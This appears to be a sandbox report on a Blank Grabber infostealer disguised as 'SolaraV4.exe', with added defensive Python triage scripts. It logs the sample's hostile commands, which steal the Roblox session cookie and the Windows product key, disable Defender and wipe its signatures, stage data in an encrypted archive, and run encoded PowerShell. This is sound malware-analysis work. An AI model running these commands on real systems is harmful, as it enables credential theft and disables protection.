Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe a -r -hp"qwerty123" "C:\Users\user\AppData\Local\Temp\6zHpy.zip" *
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
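The evidence lines above are the raw material for a host-side triage check. The Python script below is an added example and is not part of the Joe Sandbox report or of the Blank Grabber sample: it parses "Source: … Process created: …" lines of the shape printed in this report, decodes any PowerShell -EncodedCommand blob (base64 over the UTF-16LE script, which is how the screenshot script above was recovered in clear text), and tags the defence-evasion and collection steps this sample performs (Set-MpPreference disables, Add-MpPreference exclusions, MpCmdRun -RemoveDefinitions, hosts-file attribute changes, password-protected rar staging, netsh wlan profile harvesting, attrib +h +s self-hiding). The sample log lines are copied from the evidence above except for the encoded-command line, whose blob is constructed here from a short screenshot snippet; the tag names and the helper functions are this example's own, not the sandbox's.

```python
import base64
import re

# "Source: <parent> Process created: <image> <command line>", as printed in the
# report.  Image paths may contain spaces ("C:\Program Files\..."), so each path
# is matched lazily up to its .exe/.com extension.
EVIDENCE_RE = re.compile(
    r"^Source:\s+(?P<parent>[A-Za-z]:\\.+?\.(?:exe|com))\s+"
    r"Process created:\s+(?P<image>[A-Za-z]:\\.+?\.(?:exe|com))\s+(?P<cmdline>.+)$",
    re.IGNORECASE,
)
# PowerShell accepts -EncodedCommand and its abbreviations down to -e.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Set-MpPreference switches the sample uses to turn Defender's engines off.
DEFENDER_DISABLE_FLAGS = ("-disablerealtimemonitoring", "-disableioavprotection",
                          "-disablescriptscanning", "-disableintrusionpreventionsystem")


def encode_powershell(script):
    """Build an -EncodedCommand value: base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the script behind an -EncodedCommand blob, or None if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:  # base64 of UTF-16LE text; anything else is not a PowerShell blob
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_evidence(line):
    """Split one evidence line into parent, image and cmdline; None if it is not one."""
    m = EVIDENCE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(cmdline):
    """Return the behaviour tags one command line matches (possibly several)."""
    c = cmdline.lower()
    tags = []
    if "set-mppreference" in c and any(f in c for f in DEFENDER_DISABLE_FLAGS):
        tags.append("defender_protection_disabled")
    if "add-mppreference" in c and "-exclusionpath" in c:
        tags.append("defender_exclusion_added")
    if "mpcmdrun" in c and "-removedefinitions" in c:
        tags.append("defender_definitions_removed")
    if "drivers\\etc\\hosts" in c:
        tags.append("hosts_file_tampering")
    if re.search(r"\brar(?:\.exe)?\b.*\s-hp", c):  # rar a -hp<password>: encrypted loot
        tags.append("password_protected_archive_staging")
    if "netsh wlan show profile" in c:
        tags.append("wifi_profile_harvest")
    if "attrib" in c and "+h" in c and "+s" in c:
        tags.append("self_hiding")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        tags.append("encoded_powershell")
        if "copyfromscreen" in decoded.lower():
            tags.append("screenshot_capture")
    return tags


def triage(lines):
    """Return (image, cmdline, tags) for every evidence line that matched a tag."""
    hits = []
    for line in lines:
        ev = parse_evidence(line)
        tags = classify(ev["cmdline"]) if ev else []
        if tags:
            hits.append((ev["image"], ev["cmdline"], tags))
    return hits


def summarize(lines):
    """Sorted set of all tags seen across the evidence lines."""
    return sorted({t for _, _, tags in triage(lines) for t in tags})


# Constructed input: lines copied from the evidence above, plus one encoded
# command whose blob is built here from a short screenshot snippet.
_SCREENSHOT_SNIPPET = "$g = [System.Drawing.Graphics]::FromImage($bmp); $g.CopyFromScreen(0, 0, 0, 0, $bmp.Size)"
SAMPLE_LINES = [
    r'Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -Force && "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"',
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'",
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts",
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe a -r -hp"qwerty123" "C:\Users\user\AppData\Local\Temp\6zHpy.zip" *',
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile",
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe"',
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + encode_powershell(_SCREENSHOT_SNIPPET),
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST",  # benign: no tag
    "Source: C:\\Windows\\System32\\cmd.exe Process created: unknown unknown",  # no image path: skipped
]

if __name__ == "__main__":
    for image, cmdline, tags in triage(SAMPLE_LINES):
        print(f"{', '.join(tags):50s} {image}")
    print("summary:", summarize(SAMPLE_LINES))
```

Run it directly to print one line per flagged process plus the set of tags seen. On a real host the same functions can be fed Sysmon event ID 1 or Security event ID 4688 command lines once they are reformatted into the "Source: … Process created: …" shape; the -EncodedCommand decoder is the step worth keeping regardless, since the screenshot logic in this sample is only visible after that decode.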
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag
4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend Jump to behavior
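The two `set-mppreference` entries above (the `cmd.exe /c` chain and the `powershell.exe` child it spawns) switch Defender off in one shot: real-time, IOAV and script scanning disabled, the network inspection system (IPS) disabled, network protection dropped to audit mode, controlled folder access off, cloud reporting (MAPS) and sample submission off (`-submitsamplesconsent 2` is the numeric form of `NeverSend`), and finally `mpcmdrun.exe -removedefinitions -all` wiping the signature set. The Python below is an added triage helper, not part of the report or of the sample; it parses command lines of this shape and names each protection they turn off, so a detection pipeline or an analyst reads the impact rather than the raw switches. The parameter table also covers two switches this sample does not use (`-DisableBehaviorMonitoring`, `-ExclusionPath`), marked as such in the code. The sample command line is the `cmd.exe` entry above, copied as the report records it (case-folded).

```python
import re

# Set-MpPreference / Add-MpPreference parameters that weaken Defender, keyed by lower-cased
# name. Value: (argument values that constitute tampering, or None for "any value"; label).
# Numeric forms are the documented enum values, e.g. SubmitSamplesConsent 2 = NeverSend,
# EnableNetworkProtection 2 = AuditMode, MAPSReporting 0 = Disabled.
TAMPER_PARAMS = {
    "disablerealtimemonitoring":       ({"$true", "1"}, "real-time protection off"),
    "disableioavprotection":           ({"$true", "1"}, "IOAV (downloaded file/attachment) scanning off"),
    "disablescriptscanning":           ({"$true", "1"}, "script scanning off"),
    "disableintrusionpreventionsystem": ({"$true", "1"}, "network inspection system (IPS) off"),
    "disablebehaviormonitoring":       ({"$true", "1"}, "behavior monitoring off"),      # not used by this sample
    "enablecontrolledfolderaccess":    ({"disabled", "0"}, "controlled folder access off"),
    "enablenetworkprotection":         ({"disabled", "0", "auditmode", "2"}, "network protection not blocking"),
    "mapsreporting":                   ({"disabled", "0"}, "cloud-delivered protection (MAPS) off"),
    "submitsamplesconsent":            ({"neversend", "2"}, "automatic sample submission off"),
    "exclusionpath":                   (None, "scan exclusion added"),                  # not used by this sample
}

# The cmd.exe entry from the report's process tree (the report has already case-folded it).
SAMPLE_CMDLINE = (
    'c:\\windows\\system32\\cmd.exe /c "powershell set-mppreference '
    '-disableintrusionpreventionsystem $true -disableioavprotection $true '
    '-disablerealtimemonitoring $true -disablescriptscanning $true '
    '-enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode '
    '-force -mapsreporting disabled -submitsamplesconsent neversend '
    '&& powershell set-mppreference -submitsamplesconsent 2 '
    '& "%programfiles%\\windows defender\\mpcmdrun.exe" -removedefinitions -all"'
)


def split_commands(cmdline: str) -> list:
    """Split a cmd.exe / PowerShell command line into its chained commands (&&, &, ;, |)."""
    return [seg.strip() for seg in re.split(r"&&|&|;|\|", cmdline) if seg.strip()]


def parse_mppreference(segment: str) -> list:
    """(parameter, value) pairs of a Set-/Add-MpPreference call, lower-cased. Accepts both
    '-Name value' and '-Name:value'; a switch with no value gets ''."""
    tokens = segment.split()
    pairs, i = [], 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-"):
            if ":" in tok:
                name, value = tok[1:].split(":", 1)
            elif i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
                name, value = tok[1:], tokens[i + 1]
                i += 1
            else:
                name, value = tok[1:], ""
            pairs.append((name.lower(), value.lower()))
        i += 1
    return pairs


def defender_tampering(cmdline: str) -> list:
    """Every Defender protection the command line switches off, in command order."""
    findings = []
    for segment in split_commands(cmdline.lower()):
        if "mpcmdrun.exe" in segment and "-removedefinitions" in segment:
            findings.append("signature definitions removed (MpCmdRun -RemoveDefinitions)")
            continue
        if not re.search(r"\b(set|add)-mppreference\b", segment):
            continue
        for name, value in parse_mppreference(segment):
            if name not in TAMPER_PARAMS:
                continue
            bad_values, label = TAMPER_PARAMS[name]
            if bad_values is None or value in bad_values:
                findings.append(f"{label} (-{name} {value})" if value else f"{label} (-{name})")
    return findings


if __name__ == "__main__":
    for finding in defender_tampering(SAMPLE_CMDLINE):
        print(finding)
```

On a host where this ran, `Get-MpPreference` and `Get-MpComputerStatus` show the resulting state; the settings go back with the matching `Set-MpPreference` calls (`-DisableRealtimeMonitoring $false`, and so on) and the definitions with `Update-MpSignature`. Where Tamper Protection is enabled these `Set-MpPreference` changes are not honoured, so the sandbox's success here does not imply the same outcome on a managed endpoint; the command lines are still worth alerting on.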
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiab